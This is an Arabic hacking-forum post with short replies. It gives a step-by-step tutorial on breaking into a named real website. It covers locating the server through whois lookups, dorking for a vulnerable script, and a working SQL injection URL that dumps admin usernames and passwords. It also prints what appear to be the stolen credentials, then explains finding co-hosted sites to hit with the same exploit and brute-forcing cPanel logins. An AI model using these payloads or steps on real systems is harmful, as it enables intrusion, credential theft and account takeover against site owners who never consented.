حصريا : استهداف موقع و اكتشاف ثغرات ثم استخراج السيرفر و المواقع التابعة و استهدافها و استخراج اليوزرات و التخمين علي السي بانل

[b10001]

الدرس الاول استهداف الموقع و استخراج السيرفر

كود PHP:

http://mckitchens.com/ 


الموقع المستهدف نستخرج السيرفر من عدة مواقع منها

كود PHP:

www.whois.net/
www.raynette.fr/services/whois/
whois.domaintools.com/ 
www.whois.sc/ 


نستعمل موقع هذا احسن لنخرج السيرفر

كود PHP:

news.netcraft.com/ 


نكتب الموقع علي الشكل التالي

كود PHP:

mckitchens.com 


ثم نظغط علي raport

السيرفر هو

كود PHP:

IP address    209.234.251.93    Site rank    201
Country     US    Nameserver    ns1.drudgereport.com
Date first seen    April 1997    DNS admin    __hostmaster@drudgereport.com
Domain Registrar    networksolutions.com    Reverse DNS    unknown
Organisation    Drudge, Matt, PO Box 459ATTN DRUDGEREPORT.COM, care of Network Solutions, Drums, Panama    Nameserver Organisation    Drudge, Matt, PO Box 459ATTN DRUDGEREPORT.COM, care of Network Solutions, Drums, Panama 


كود PHP:

 209.234.251.93 


الدرس الثاني اكتشاف الثغرات في الموقع

اول شي نروح لل

كود PHP:

Bing.com 


نكتب كما موجود للبحث عن الثغرات مع اني كنت اتصفح فلموقع فلقيت سكريبت

كود PHP:

panorama-viewer.php?id= 


يعني سنبحث عن ثغرات SQL injection

نكتب شبه دورك

كود PHP:

inurl:"panorama-viewer.php?id=" 


سنجد كثير مواقع منها موقعنا اي يعني انه مصاب اوكي عملنا كل شي الا الاستغلال

روح لموقع ثغرات نكتب

كود PHP:

exploit-db.com 


كود PHP:

chercher : inurl:"panorama-viewer.php?id=" 


يعني طلعتلنا الثغرة


الدرس الثالث اختراق الموقع

اوكي الدورك هنا

كود PHP:

Google search: inurl:panorama-viewer.php?id= 


الاستغلال

كود PHP:

http://server/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users--


[-] http://server/adm/users.php

[-] http://server/adm/panorama_edit.php?id=1

[-] http://server/listimages/shell.php 


الموقع المستهدف

كود PHP:

http://mckitchens.com/panorama-viewer.php?id=1 


تم الاختراق

كود PHP:

http://mckitchens.com/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,group_concat%28user_name,0x3a,user_pwd%29,5,6+from+mc_users-- 


معلومات الادمين

كود PHP:

JOHNZ3CABN:MCKMIS89A3F,GINNYUZ3R:*P255W0RD407 


الدرس الرابع استخراج مواقع السيرفر

كود PHP:

http://www.yougetsignal.com/tools/web-sites-on-web-server/ 


الموقع يخرج مواقع السيرفر و انت طبق عليهم الثفرة
ثم نفتح الnotepad

نضع المواقع و نحذف منها com net org etc

نسجل الملف تيكست نصي ونفتحه بالmicrosoft accés

نضع الموشر في الثمانين

مبروك عليك اليوزرات ثم خمن علي السي بانل

تحياتي لكم يا عناكب

جبروت هكر معجب بهذا

المصدر: :: vBspiders Professional Network ::

---

pwvdh : hsji]ht l,ru , h;jaht eyvhj el hsjovh[ hgsdvtv hgl,hru hgjhfum hsji]htih hgd,.vhj

[haCk3erFoREv3er]

موفق اخوي

[Spire_Barde]

شكرا أخي